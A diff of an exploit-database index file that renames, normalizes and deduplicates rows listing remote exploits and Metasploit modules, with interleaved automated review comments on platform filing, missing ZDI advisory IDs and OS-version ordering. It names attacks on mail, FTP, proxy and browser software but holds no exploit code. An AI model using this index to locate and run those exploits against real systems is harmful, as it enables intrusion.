 16478,platforms/windows/remote/16478.rb,"Novell NetMail 3.52d - IMAP Subscribe Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16479,platforms/windows/remote/16479.rb,"IPSwitch IMail IMAP4D - Delete Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0
 16480,platforms/windows/remote/16480.rb,"MailEnable - IMAPD W3C Logging Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0
@@ -10841,7 +10829,6 @@ id,file,description,date,author,platform,type,port
 16498,platforms/windows/remote/16498.rb,"EnjoySAP SAP GUI - ActiveX Control Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0
 16499,platforms/windows/remote/16499.rb,"Microsoft Internet Explorer - Unsafe Scripting Misconfiguration (Metasploit)",2010-09-20,Metasploit,windows,remote,0
 16500,platforms/windows/remote/16500.rb,"Hyleos ChemView - ActiveX Control Stack Buffer Overflow (Metasploit)",2010-07-27,Metasploit,windows,remote,0
-16501,platforms/windows/remote/16501.rb,"Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit) (2)",2010-09-21,Metasploit,windows,remote,0
 16502,platforms/windows/remote/16502.rb,"IBM Lotus Domino Web Access Upload Module - Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0
 16505,platforms/windows/remote/16505.rb,"Facebook Photo Uploader 4 - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16506,platforms/windows/remote/16506.rb,"Microsoft Internet Explorer - Daxctle.OCX KeyFrame Method Heap Buffer Overflow (MS06-067) (Metasploit)",2010-07-16,Metasploit,windows,remote,0
@@ -10928,7 +10915,6 @@ id,file,description,date,author,platform,type,port
 16592,platforms/windows/remote/16592.rb,"SoftArtisans XFile FileManager - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16594,platforms/windows/remote/16594.rb,"Adobe Shockwave Player - rcsL Memory Corruption (Metasploit)",2010-10-22,Metasploit,windows,remote,0
 16595,platforms/windows/remote/16595.rb,"Norton AntiSpam 2004 - SymSpamHelper ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
-16596,platforms/windows/remote/16596.rb,"Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (Metasploit) (1)",2010-10-04,Metasploit,windows,remote,0
 16597,platforms/windows/remote/16597.rb,"Microsoft Internet Explorer - 'VML' Fill Method Code Execution (MS06-055) (Metasploit)",2010-07-03,Metasploit,windows,remote,0
 16598,platforms/windows/remote/16598.rb,"Persits XUpload - ActiveX MakeHttpRequest Directory Traversal (Metasploit)",2010-11-11,Metasploit,windows,remote,0
 16599,platforms/windows/remote/16599.rb,"Microsoft Internet Explorer - 'Aurora' Memory Corruption (MS10-002) (Metasploit)",2010-07-12,Metasploit,windows,remote,0
@@ -10954,7 +10940,6 @@ id,file,description,date,author,platform,type,port
 16647,platforms/windows/remote/16647.rb,"EMC ApplicationXtender (KeyWorks) - ActiveX Control Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0
 16649,platforms/windows/remote/16649.rb,"Microsoft Works 7 - 'WkImgSrv.dll' WKsPictureInterface() ActiveX Exploit (Metasploit)",2010-09-25,Metasploit,windows,remote,0
 16685,platforms/windows/remote/16685.rb,"MOXA MediaDBPlayback - ActiveX Control Buffer Overflow (Metasploit)",2010-11-05,Metasploit,windows,remote,0
-16689,platforms/windows/remote/16689.rb,"CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit) (2)",2010-04-30,Metasploit,windows,remote,23
 16690,platforms/windows/remote/16690.rb,"QBik WinGate WWW Proxy Server - URL Processing Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,80
 16691,platforms/windows/remote/16691.rb,"Blue Coat WinProxy - Host Header Overflow (Metasploit)",2010-07-12,Metasploit,windows,remote,80
 16692,platforms/windows/remote/16692.rb,"Proxy-Pro Professional GateKeeper 4.7 - GET Request Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,3128
@@ -10997,7 +10982,7 @@ id,file,description,date,author,platform,type,port
 16729,platforms/windows/remote/16729.rb,"SlimFTPd - LIST Concatenation Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0
 16730,platforms/windows/remote/16730.rb,"3Com 3CDaemon 2.0 FTP Server - 'Username' Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0
 16731,platforms/win_x86/remote/16731.rb,"Oracle 9i XDB (Windows x86) - FTP PASS Overflow (Metasploit)",2010-04-30,Metasploit,win_x86,remote,0
-16732,platforms/windows/remote/16732.rb,"httpdx - tolog() Function Format String (Metasploit) (1)",2010-08-25,Metasploit,windows,remote,0
+16732,platforms/windows/remote/16732.rb,"httpdx - 'tolog()' Function Format String (Metasploit) (1)",2010-08-25,Metasploit,windows,remote,0
 16733,platforms/windows/remote/16733.rb,"FileCOPA FTP Server (Pre 18 Jul Version) - Exploit (Metasploit)",2010-04-30,Metasploit,windows,remote,21
 16734,platforms/windows/remote/16734.rb,"EasyFTP Server 1.7.0.11 - LIST Command Stack Buffer Overflow (Metasploit)",2010-08-03,Metasploit,windows,remote,0
 16735,platforms/windows/remote/16735.rb,"NetTerm NetFTPD - USER Buffer Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0
@@ -11049,7 +11034,7 @@ id,file,description,date,author,platform,type,port
 16781,platforms/windows/remote/16781.rb,"MailEnable - Authorisation Header Buffer Overflow (Metasploit)",2010-07-07,Metasploit,windows,remote,0
 16782,platforms/win_x86/remote/16782.rb,"Apache (Windows x86) - Chunked Encoding (Metasploit)",2010-07-07,Metasploit,win_x86,remote,0
 16783,platforms/win_x86/remote/16783.rb,"McAfee ePolicy Orchestrator / ProtectionPilot - Overflow Exploit (Metasploit)",2010-09-20,Metasploit,win_x86,remote,0
-16784,platforms/multiple/remote/16784.rb,"Novell ZENworks Configuration Management 10.2.0 - Remote Execution (Metasploit) (1)",2010-11-22,Metasploit,multiple,remote,80
+16784,platforms/multiple/remote/16784.rb,"Novell ZENworks Configuration Management 10.2.0 - Remote Execution (Metasploit)",2010-11-22,Metasploit,multiple,remote,80
 16785,platforms/windows/remote/16785.rb,"Hewlett-Packard (HP) Power Manager Administration - Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,80
 16786,platforms/win_x86/remote/16786.rb,"PeerCast 0.1216 (Windows x86) - URL Handling Buffer Overflow (Metasploit)",2010-09-20,Metasploit,win_x86,remote,7144
 16787,platforms/windows/remote/16787.rb,"IPSwitch WhatsUp Gold 8.03 - Buffer Overflow (Metasploit)",2010-07-14,Metasploit,windows,remote,0
@@ -11057,7 +11042,7 @@ id,file,description,date,author,platform,type,port
 16791,platforms/windows/remote/16791.rb,"MaxDB WebDBM - GET Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,9999
 16792,platforms/windows/remote/16792.rb,"HP OpenView Network Node Manager - OvWebHelp.exe CGI Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0
 16793,platforms/windows/remote/16793.rb,"Amlibweb NetOpacs - 'webquery.dll' Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,80
-16794,platforms/windows/remote/16794.rb,"httpdx - tolog() Function Format String (Metasploit) (2)",2010-08-25,Metasploit,windows,remote,80
+16794,platforms/windows/remote/16794.rb,"httpdx - 'tolog()' Function Format String (Metasploit) (2)",2010-08-25,Metasploit,windows,remote,80
 16795,platforms/cgi/remote/16795.rb,"HP OpenView Network Node Manager - Toolbar.exe CGI Buffer Overflow (Metasploit)",2010-05-09,Metasploit,cgi,remote,0
 16796,platforms/windows/remote/16796.rb,"BEA Weblogic - Transfer-Encoding Buffer Overflow (Metasploit)",2010-07-08,Metasploit,windows,remote,80
 16797,platforms/windows/remote/16797.rb,"HP OpenView Network Node Manager (OV NNM) - ovalarm.exe CGI Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0
@@ -11137,9 +11122,7 @@ id,file,description,date,author,platform,type,port
 16874,platforms/osx/remote/16874.rb,"Apple Mac OSX EvoCam Web Server - HTTP GET Buffer Overflow (Metasploit)",2010-10-09,Metasploit,osx,remote,0
 16875,platforms/osx/remote/16875.rb,"Samba 3.0.10 (OSX) - 'lsa_io_trans_names' Heap Overflow (Metasploit)",2010-04-05,Metasploit,osx,remote,0
 16876,platforms/osx_ppc/remote/16876.rb,"Samba 2.2.8 (OSX/PPC) - 'trans2open' Overflow (Metasploit)",2010-06-21,Metasploit,osx_ppc,remote,0
-16877,platforms/irix/remote/16877.rb,"Irix LPD tagprinter - Command Execution (Metasploit) (2)",2010-10-06,Metasploit,irix,remote,0
 16878,platforms/linux/remote/16878.rb,"ProFTPd 1.3.2rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit)",2010-12-02,Metasploit,linux,remote,0
-16879,platforms/freebsd/remote/16879.rb,"Xtacacsd 4.1.2 - report() Buffer Overflow (Metasploit) (2)",2010-05-09,Metasploit,freebsd,remote,0
 16880,platforms/bsd_x86/remote/16880.rb,"Samba 2.2.8 (*BSD x86) - 'trans2open' Overflow Exploit (Metasploit)",2010-06-17,Metasploit,bsd_x86,remote,0
 16887,platforms/linux/remote/16887.rb,"HP OpenView Network Node Manager (OV NNM) - connectedNodes.ovpl Remote Command Execution (Metasploit)",2010-07-03,Metasploit,linux,remote,0
 16888,platforms/linux/remote/16888.rb,"SquirrelMail PGP Plugin - Command Execution (SMTP) (Metasploit)",2010-08-25,Metasploit,linux,remote,0
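Review bot: Row 16879 is removed as the twin of 10035, but it is filed under `platforms/freebsd/` with platform `freebsd`, while the surviving 10035 sits under `platforms/bsd/` with platform `bsd`, so this is not a pure index duplicate: a platform-filtered search for FreeBSD modules loses its only hit for this bug. If the two modules are identical, consider keeping the more specific platform or re-filing the survivor; if they differ, this deletion drops a distinct target rather than a duplicate. The 16877 versus 10033 pair in the same hunk is the cleaner case, since both are `irix`.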
@@ -11148,7 +11131,6 @@ id,file,description,date,author,platform,type,port
 16915,platforms/linux/remote/16915.rb,"Oracle VM Server Virtual Server Agent - Command Injection (Metasploit)",2010-10-25,Metasploit,linux,remote,0
 16916,platforms/linux/remote/16916.rb,"Citrix Access Gateway - Command Execution (Metasploit)",2011-03-03,Metasploit,linux,remote,0
 16918,platforms/freebsd/remote/16918.rb,"Zabbix Agent - net.tcp.listen Command Injection (Metasploit)",2010-07-03,Metasploit,freebsd,remote,0
-16919,platforms/linux/remote/16919.rb,"DistCC Daemon - Command Execution (Metasploit) (2)",2010-07-03,Metasploit,linux,remote,0
 16920,platforms/linux/remote/16920.rb,"SpamAssassin spamd - Remote Command Execution (Metasploit)",2010-04-30,Metasploit,linux,remote,0
 16921,platforms/linux/remote/16921.rb,"ProFTPd-1.3.3c - Backdoor Command Execution (Metasploit)",2010-12-03,Metasploit,linux,remote,0
 16922,platforms/linux/remote/16922.rb,"UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)",2010-12-05,Metasploit,linux,remote,0
@@ -11217,8 +11199,8 @@ id,file,description,date,author,platform,type,port
 17300,platforms/windows/remote/17300.rb,"7-Technologies IGSS 9.00.00 b11063 - IGSSdataServer.exe Stack Overflow (Metasploit)",2011-05-16,Metasploit,windows,remote,0
 17304,platforms/windows/remote/17304.txt,"Cisco Unified Operations Manager - Multiple Vulnerabilities",2011-05-18,"Sense of Security",windows,remote,0
 17328,platforms/windows/remote/17328.html,"Magneto ICMP ActiveX 4.0.0.20 - ICMPSendEchoRequest Remote Code Execute",2011-05-27,boahat,windows,remote,0
-17345,platforms/windows/remote/17345.py,"HP Data Protector Client 6.11 - EXEC_SETUP Remote Code Execution PoC (ZDI-11-056)",2011-05-29,fdiskyou,windows,remote,0
-17339,platforms/windows/remote/17339.py,"HP Data Protector Client 6.11 - EXEC_CMD Remote Code Execution PoC (ZDI-11-055)",2011-05-28,fdiskyou,windows,remote,0
+17345,platforms/windows/remote/17345.py,"HP Data Protector Client 6.11 - 'EXEC_SETUP' Remote Code Execution (PoC)",2011-05-29,fdiskyou,windows,remote,0
+17339,platforms/windows/remote/17339.py,"HP Data Protector Client 6.11 - 'EXEC_CMD' Remote Code Execution (PoC)",2011-05-28,fdiskyou,windows,remote,0
 17352,platforms/windows/remote/17352.rb,"7-Technologies IGSS 9 - Data Server/Collector Packet Handling Vulnerabilities (Metasploit)",2011-05-30,Metasploit,windows,remote,0
 17354,platforms/windows/remote/17354.py,"EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow (2)",2011-06-01,b33f,windows,remote,0
 17355,platforms/windows/remote/17355.rb,"Golden FTP Server 4.70 - PASS Stack Buffer Overflow (Metasploit)",2011-06-02,Metasploit,windows,remote,21
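Review bot: The rewritten rows 17345 and 17339 drop `ZDI-11-056` and `ZDI-11-055`, which were the only external advisory references on those rows, while the rest of this commit keeps bulletin IDs in a trailing parenthesis (`(MS08-069)`, `(MS09-002)` in the earlier hunks). Without the ZDI IDs there is nothing left on the row to map these PoCs to the vendor fix or to the matching CVE record. Keep them in the same style: `"HP Data Protector Client 6.11 - 'EXEC_SETUP' Remote Code Execution (PoC) (ZDI-11-056)"` and `"HP Data Protector Client 6.11 - 'EXEC_CMD' Remote Code Execution (PoC) (ZDI-11-055)"`.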
@@ -11281,7 +11263,7 @@ id,file,description,date,author,platform,type,port
 17645,platforms/hardware/remote/17645.py,"iphone/ipad phone drive 1.1.1 - Directory Traversal",2011-08-09,"Khashayar Fereidani",hardware,remote,0
 17648,platforms/linux/remote/17648.sh,"HP Data Protector (Linux) - Remote Command Execution",2011-08-10,SZ,linux,remote,0
 17649,platforms/windows/remote/17649.py,"BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow",2011-08-10,localh0t,windows,remote,0
-17650,platforms/windows/remote/17650.rb,"Mozilla Firefox 3.6.16 - mChannel Use-After-Free (Metasploit) (1)",2011-08-10,Metasploit,windows,remote,0
+17650,platforms/windows/remote/17650.rb,"Mozilla Firefox 3.6.16 (Windows) - mChannel Use-After-Free (Metasploit) (1)",2011-08-10,Metasploit,windows,remote,0
 17656,platforms/windows/remote/17656.rb,"TeeChart Professional ActiveX Control 2010.0.0.3 - Trusted Integer Dereference (Metasploit)",2011-08-11,Metasploit,windows,remote,0
 17659,platforms/windows/remote/17659.rb,"Microsoft MPEG Layer-3 Audio - Stack Based Overflow (MS10-026) (Metasploit)",2011-08-13,Metasploit,windows,remote,0
 17670,platforms/hardware/remote/17670.py,"Sagem Router Fast 3304/3464/3504 - Telnet Authentication Bypass",2011-08-16,"Elouafiq Ali",hardware,remote,0
@@ -11307,7 +11289,7 @@ id,file,description,date,author,platform,type,port
 17884,platforms/windows/remote/17884.py,"Cogent Datahub 7.1.1.63 - Remote Unicode Buffer Overflow",2011-09-22,mr_me,windows,remote,0
 17886,platforms/windows/remote/17886.py,"Freefloat FTP Server - Buffer Overflow (DEP Bypass)",2011-09-23,blake,windows,remote,0
 17904,platforms/windows/remote/17904.rb,"ScriptFTP 3.3 - Remote Buffer Overflow (Metasploit)",2011-09-29,otoy,windows,remote,0
-17936,platforms/windows/remote/17936.rb,"Opera 10/11 - (bad nesting with frameset tag) Memory Corruption (Metasploit)",2011-10-06,"Jose A. Vazquez",windows,remote,0
+17936,platforms/windows/remote/17936.rb,"Opera 10/11 - Bad Nesting with Frameset Tag Memory Corruption (Metasploit)",2011-10-06,"Jose A. Vazquez",windows,remote,0
 17948,platforms/windows/remote/17948.rb,"ScriptFTP 3.3 - Remote Buffer Overflow (LIST) (Metasploit) (2)",2011-10-09,Metasploit,windows,remote,0
 17969,platforms/multiple/remote/17969.py,"Apache mod_proxy - Reverse Proxy Exposure (PoC)",2011-10-11,"Rodrigo Marcos",multiple,remote,0
 17960,platforms/windows/remote/17960.rb,"Opera Browser 10/11/12 - (SVG layout) Memory Corruption (Metasploit)",2011-10-10,"Jose A. Vazquez",windows,remote,0
@@ -11354,7 +11336,7 @@ id,file,description,date,author,platform,type,port
 18367,platforms/windows/remote/18367.rb,"XAMPP - WebDAV PHP Upload (Metasploit)",2012-01-14,Metasploit,windows,remote,0
 18368,platforms/linux/remote/18368.rb,"Linux BSD-derived Telnet Service Encryption Key ID - Buffer Overflow (Metasploit)",2012-01-14,Metasploit,linux,remote,0
 18369,platforms/bsd/remote/18369.rb,"FreeBSD Telnet Service - Encryption Key ID Buffer Overflow (Metasploit)",2012-01-14,Metasploit,bsd,remote,0
-18377,platforms/osx/remote/18377.rb,"Mozilla Firefox 3.6.16 - mChannel Use-After-Free (Metasploit) (2)",2012-01-17,Metasploit,osx,remote,0
+18377,platforms/osx/remote/18377.rb,"Mozilla Firefox 3.6.16 (OSX) - mChannel Use-After-Free (Metasploit) (2)",2012-01-17,Metasploit,osx,remote,0
 18381,platforms/windows/remote/18381.rb,"HP Easy Printer Care - XMLCacheMgr Class ActiveX Control Remote Code Execution (Metasploit)",2012-01-18,Metasploit,windows,remote,0
 18382,platforms/windows/remote/18382.py,"Sysax Multi Server 5.50 - Create Folder Buffer Overflow",2012-01-18,"Craig Freyman",windows,remote,0
 18388,platforms/windows/remote/18388.rb,"HP OpenView Network Node Manager - 'ov.dll' _OVBuildPath Buffer Overflow (Metasploit)",2012-01-20,Metasploit,windows,remote,0
@@ -12261,7 +12243,7 @@ id,file,description,date,author,platform,type,port
 21128,platforms/unix/remote/21128.c,"NSI Rwhoisd 1.5 - Remote Format String",2001-04-17,CowPower,unix,remote,0
 21129,platforms/cgi/remote/21129.java,"iBill Management Script - Weak Hard-Coded Password",2001-10-25,"MK Ultra",cgi,remote,0
 21136,platforms/linux/remote/21136.rb,"Symantec Messaging Gateway 9.5/9.5.1 - SSH Default Password Security Bypass (Metasploit)",2012-08-30,Metasploit,linux,remote,0
-21137,platforms/multiple/remote/21137.rb,"HP SiteScope - Remote Code Execution (Metasploit) (1)",2012-09-08,Metasploit,multiple,remote,0
+21137,platforms/multiple/remote/21137.rb,"HP SiteScope (Linux/Windows) - Remote Code Execution (Metasploit)",2012-09-08,Metasploit,multiple,remote,0
 21138,platforms/php/remote/21138.rb,"Sflog! CMS 1.0 - Arbitrary File Upload (Metasploit)",2012-09-08,Metasploit,php,remote,0
 21142,platforms/windows/remote/21142.pl,"Ipswitch WS_FTP Server 1.0.x/2.0.x - 'STAT' Buffer Overflow",2001-11-05,andreas,windows,remote,0
 21144,platforms/windows/remote/21144.txt,"Microsoft Internet Explorer 5/6 - Cookie Disclosure/Modification",2001-11-09,"Jouko Pynnonen",windows,remote,0
@@ -12538,7 +12520,7 @@ id,file,description,date,author,platform,type,port
 21888,platforms/windows/remote/21888.rb,"KeyHelp - ActiveX LaunchTriPane Remote Code Execution (Metasploit)",2012-10-11,Metasploit,windows,remote,0
 21897,platforms/windows/remote/21897.txt,"SurfControl SuperScout WebFilter for Windows 2000 - File Disclosure",2002-10-02,"Matt Moore",windows,remote,0
 21898,platforms/windows/remote/21898.txt,"SurfControl SuperScout WebFilter for Windows 2000 - SQL Injection",2002-10-02,"Matt Moore",windows,remote,0
-21902,platforms/windows/remote/21902.c,"Microsoft Windows Server 2000/NT 4/XP - Help Facility ActiveX Control Buffer Overflow",2002-10-07,ipxodi,windows,remote,0
+21902,platforms/windows/remote/21902.c,"Microsoft Windows XP/2000/NT 4 - Help Facility ActiveX Control Buffer Overflow",2002-10-07,ipxodi,windows,remote,0
 21910,platforms/windows/remote/21910.txt,"Microsoft IIS 5.0 - IDC Extension Cross-Site Scripting",2002-10-05,Roberto,windows,remote,0
 21913,platforms/windows/remote/21913.txt,"Citrix Published Applications - Information Disclosure",2002-10-07,wire,windows,remote,0
 21919,platforms/unix/remote/21919.sh,"Sendmail 8.12.6 - Trojan Horse",2002-10-08,netmask,unix,remote,0
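Review bot: The two Windows rows renamed in this pass order the OS versions differently: 21902 becomes `Microsoft Windows XP/2000/NT 4` (newest first) while 22837 in the next hunk (@@ -12793) becomes `Microsoft Windows NT 4/2000` (oldest first). A title-normalization commit should settle on one ordering so the product prefix sorts and searches consistently; e.g. `Microsoft Windows NT 4/2000/XP - Help Facility ActiveX Control Buffer Overflow` for 21902 would match the 22837 form.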
@@ -12793,7 +12775,7 @@ id,file,description,date,author,platform,type,port
 22832,platforms/freebsd/remote/22832.pl,"Gkrellmd 2.1 - Remote Buffer Overflow (2)",2003-06-24,dodo,freebsd,remote,0
 22833,platforms/windows/remote/22833.c,"Alt-N WebAdmin 2.0.x - USER Parameter Buffer Overflow (1)",2003-06-24,"Mark Litchfield",windows,remote,0
 22834,platforms/windows/remote/22834.c,"Alt-N WebAdmin 2.0.x - USER Parameter Buffer Overflow (2)",2003-06-24,"Mark Litchfield",windows,remote,0
-22837,platforms/windows/remote/22837.c,"Microsoft Windows Server 2000/NT 4 Media Services - 'nsiislog.dll' Remote Buffer Overflow",2003-06-25,firew0rker,windows,remote,0
+22837,platforms/windows/remote/22837.c,"Microsoft Windows NT 4/2000 - Media Services 'nsiislog.dll' Remote Buffer Overflow",2003-06-25,firew0rker,windows,remote,0
 22838,platforms/windows/remote/22838.txt,"BRS Webweaver 1.0 - Error Page Cross-Site Scripting",2003-06-26,"Carsten H. Eiram",windows,remote,0
 22848,platforms/linux/remote/22848.c,"ezbounce 1.0/1.5 - Format String",2003-07-01,V9,linux,remote,0
 22854,platforms/windows/remote/22854.txt,"LAN.FS Messenger 2.4 - Command Execution",2012-11-20,Vulnerability-Lab,windows,remote,0
@@ -12923,7 +12905,7 @@ id,file,description,date,author,platform,type,port
 23296,platforms/linux/remote/23296.txt,"RedHat Apache 2.0.40 - Directory Index Default Configuration Error",2003-10-27,TfM,linux,remote,0
 23298,platforms/windows/remote/23298.txt,"Macromedia Flash Player 6.0.x - Flash Cookie Predictable File Location",2003-10-24,Mindwarper,windows,remote,0
 23304,platforms/cgi/remote/23304.txt,"Symantec Norton Internet Security 2003 6.0.4.34 - Error Message Cross-Site Scripting",2003-10-27,KrazySnake,cgi,remote,0
-23306,platforms/linux/remote/23306.c,"thttpd 2.2x - defang Remote Buffer Overflow",2003-10-27,d3ck4,linux,remote,0
+23306,platforms/linux/remote/23306.c,"thttpd 2.2x - 'defang' Remote Buffer Overflow",2003-10-27,d3ck4,linux,remote,0
 23307,platforms/multiple/remote/23307.txt,"Fastream NetFile 6.0.3.588 - Error Message Cross-Site Scripting",2003-10-28,"Oliver Karow",multiple,remote,0
 23309,platforms/multiple/remote/23309.txt,"Centrinity FirstClass HTTP Server 7.1 - Directory Disclosure",2003-10-28,"Richard Maudsley",multiple,remote,0
 23312,platforms/cgi/remote/23312.txt,"BEA Tuxedo 6/7/8 and WebLogic Enterprise 4/5 - Input Validation",2003-10-30,"Corsaire Limited",cgi,remote,0
@@ -13318,7 +13300,7 @@ id,file,description,date,author,platform,type,port
 24935,platforms/linux/remote/24935.rb,"MongoDB - nativeHelper.apply Remote Code Execution (Metasploit)",2013-04-08,Metasploit,linux,remote,0
 24936,platforms/hardware/remote/24936.rb,"Linksys E1500/E2500 - apply.cgi Remote Command Injection (Metasploit)",2013-04-08,Metasploit,hardware,remote,0
 24937,platforms/linux/remote/24937.rb,"HP System Management - Anonymous Access Code Execution (Metasploit)",2013-04-08,Metasploit,linux,remote,0
-24938,platforms/multiple/remote/24938.rb,"Novell ZENworks Configuration Management 10.2.0 - Remote Execution (Metasploit) (2)",2013-04-08,Metasploit,multiple,remote,0
+24938,platforms/multiple/remote/24938.rb,"Novell ZENworks Configuration Management 10 SP3 / 11 SP2 - Remote Execution (Metasploit)",2013-04-08,Metasploit,multiple,remote,0
 24950,platforms/windows/remote/24950.pl,"KNet Web Server 1.04b - Stack Corruption Buffer Overflow",2013-04-12,Wireghoul,windows,remote,0
 643,platforms/windows/remote/643.c,"Seattle Lab Mail (SLMail) 5.5 - POP3 PASS Remote Buffer Overflow",2004-12-21,"Haroon Rashid Astwat",windows,remote,0
 646,platforms/windows/remote/646.c,"Seattle Lab Mail (SLMail) 5.5 - Remote Buffer Overflow",2004-12-22,"Ivan Ivanovic",windows,remote,0
@@ -13415,7 +13397,7 @@ id,file,description,date,author,platform,type,port
 25275,platforms/linux/remote/25275.c,"Smail 3 - Multiple Remote and Local Vulnerabilities",2005-03-25,infamous42md,linux,remote,0
 25291,platforms/multiple/remote/25291.txt,"Tincat Network Library - Remote Buffer Overflow",2005-03-28,"Luigi Auriemma",multiple,remote,0
 25775,platforms/linux/remote/25775.rb,"Nginx 1.3.9 < 1.4.0 - Chuncked Encoding Stack Buffer Overflow (Metasploit)",2013-05-28,Metasploit,linux,remote,80
-25297,platforms/linux/remote/25297.txt,"Dovecot with Exim - sender_address Parameter Remote Command Execution",2013-05-07,"RedTeam Pentesting GmbH",linux,remote,0
+25297,platforms/linux/remote/25297.txt,"Dovecot with Exim - 'sender_address' Parameter Remote Command Execution",2013-05-07,"RedTeam Pentesting GmbH",linux,remote,0
 25319,platforms/windows/remote/25319.txt,"FastStone 4in1 Browser 1.2 - Web Server Directory Traversal",2005-03-29,"Donato Ferrante",windows,remote,0
 25321,platforms/linux/remote/25321.c,"YepYep MTFTPD 0.2/0.3 - Remote CWD Argument Format String",2005-03-30,gunzip,linux,remote,0
 25325,platforms/windows/remote/25325.txt,"BlueSoleil 1.4 - Object Push Service BlueTooth Arbitrary File Upload / Directory Traversal",2005-04-01,"Kevin Finisterre",windows,remote,0
@@ -13700,7 +13682,7 @@ id,file,description,date,author,platform,type,port
 28183,platforms/windows/remote/28183.py,"eM Client e-mail client 5.0.18025.0 - Persistent Cross-Site Scripting",2013-09-10,loneferret,windows,remote,0
 28186,platforms/windows/remote/28186.c,"Kaillera 0.86 - Message Buffer Overflow",2006-07-06,"Luigi Auriemma",windows,remote,0
 28187,platforms/windows/remote/28187.rb,"Microsoft Internet Explorer - CAnchorElement Use-After-Free (MS13-055) (Metasploit)",2013-09-10,Metasploit,windows,remote,0
-28188,platforms/windows/remote/28188.rb,"HP SiteScope - Remote Code Execution (Metasploit) (2)",2013-09-10,Metasploit,windows,remote,8080
+28188,platforms/windows/remote/28188.rb,"HP SiteScope (Windows) - Remote Code Execution (Metasploit)",2013-09-10,Metasploit,windows,remote,8080
 28189,platforms/windows/remote/28189.txt,"Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution",2006-07-06,Nanika,windows,remote,0
 28198,platforms/windows/remote/28198.py,"Microsoft Office 2000/2002 - Property Code Execution",2006-07-11,anonymous,windows,remote,0
 28209,platforms/multiple/remote/28209.txt,"FLV Players 8 - player.php url Parameter Cross-Site Scripting",2006-07-12,xzerox,multiple,remote,0
@@ -13732,12 +13714,11 @@ id,file,description,date,author,platform,type,port
 28397,platforms/linux/remote/28397.sh,"GNU BinUtils 2.1x - GAS Buffer Overflow",2006-08-17,"Tavis Ormandy",linux,remote,0
 28398,platforms/linux/remote/28398.txt,"MySQL 4/5 - SUID Routine Miscalculation Arbitrary DML Statement Execution",2006-08-17,"Michal Prokopiuk",linux,remote,0
 28400,platforms/windows/remote/28400.html,"Microsoft Internet Explorer 6 - 'TSUserEX.dll' ActiveX Control Memory Corruption",2006-08-17,nop,windows,remote,0
-28407,platforms/php/remote/28407.rb,"Western Digital Arkeia - Remote Code Execution (Metasploit) (1)",2013-09-20,xistence,php,remote,0
+28407,platforms/php/remote/28407.rb,"Western Digital Arkeia < 10.0.10 - Remote Code Execution (Metasploit)",2013-09-20,xistence,php,remote,0
 28408,platforms/php/remote/28408.rb,"OpenEMR 4.1.1 Patch 14 - SQL Injection / Privilege Escalation / Remote Code Execution (Metasploit)",2013-09-20,xistence,php,remote,0
 28424,platforms/linux/remote/28424.txt,"Apache 1.3.35 / 2.0.58 / 2.2.2 - Arbitrary HTTP Request Headers Security",2006-08-24,"Thiago Zaninotti",linux,remote,0
 28438,platforms/windows/remote/28438.html,"Microsoft Internet Explorer 5.0.1 - Daxctle.OCX Spline Method Heap Buffer Overflow",2006-08-28,XSec,windows,remote,0
 28450,platforms/hardware/remote/28450.py,"FiberHome Modem Router HG-110 - Authentication Bypass To Remote Change DNS Servers",2013-09-22,"Javier Perez",hardware,remote,0
-28480,platforms/windows/remote/28480.rb,"CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (Metasploit) (2)",2013-09-23,Metasploit,windows,remote,6502
 28481,platforms/windows/remote/28481.rb,"Microsoft Internet Explorer - CCaret Use-After-Free (MS13-069) (Metasploit)",2013-09-23,Metasploit,windows,remote,0
 28482,platforms/windows/remote/28482.rb,"Microsoft Windows Theme File Handling - Arbitrary Code Execution (MS13-071) (Metasploit)",2013-09-23,Metasploit,windows,remote,0
 28483,platforms/php/remote/28483.rb,"GLPI - install.php 
Remote Command Execution (Metasploit)",2013-09-23,Metasploit,php,remote,80
@@ -13952,7 +13933,6 @@ id,file,description,date,author,platform,type,port
 30471,platforms/linux/remote/30471.rb,"OpenSIS 'modname' - PHP Code Execution (Metasploit)",2013-12-24,Metasploit,linux,remote,80
 30472,platforms/linux/remote/30472.rb,"Zimbra Collaboration Server 7.2.2 / 8.0.2 - Local File Inclusion (Metasploit)",2013-12-24,Metasploit,linux,remote,7071
 30473,platforms/unix/remote/30473.rb,"HP SiteScope issueSiebelCmd - Remote Code Execution (Metasploit)",2013-12-24,Metasploit,unix,remote,8080
-30474,platforms/windows/remote/30474.rb,"Mozilla Firefox 5.0 < 15.0.1 - __exposedProps__ XCS Code Execution (Metasploit)",2013-12-24,Metasploit,windows,remote,0
 30485,platforms/hardware/remote/30485.html,"ZYXEL ZyWALL 2 3.62 - Forms/General_1 sysSystemName Parameter Cross-Site Scripting",2007-08-10,"Henri Lindberg",hardware,remote,0
